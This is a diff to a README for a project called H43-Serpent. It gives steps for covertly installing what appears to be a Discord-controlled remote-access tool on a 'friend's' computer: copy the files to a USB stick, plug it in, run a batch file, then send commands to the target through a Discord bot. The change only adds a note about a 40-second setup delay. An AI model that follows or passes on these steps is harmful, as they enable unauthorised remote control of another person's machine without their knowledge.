Fytex/H43-Serpent/README.md

 10. Copy all the files to a Pen USB.
 11. When you are near your friend just plug the Pen USB in his computer and double click on `run.bat`
 11. Wait until the window closes which takes about ~2s.
 Now unplug the Pen USB and it's all done!
-12. Go back to your computer/mobile and in your discord server which has the bot you should be able to run any command Target-Command.
+12. Python and libraries take about ~40sec to be ready.
+After that, go back to your computer/mobile and in your discord server which has the bot you should be able to run any command Target-Command.
 Ex: Fytex-help
 13. To view more info about each command do Target-help Command.
 Ex: Fytex-help type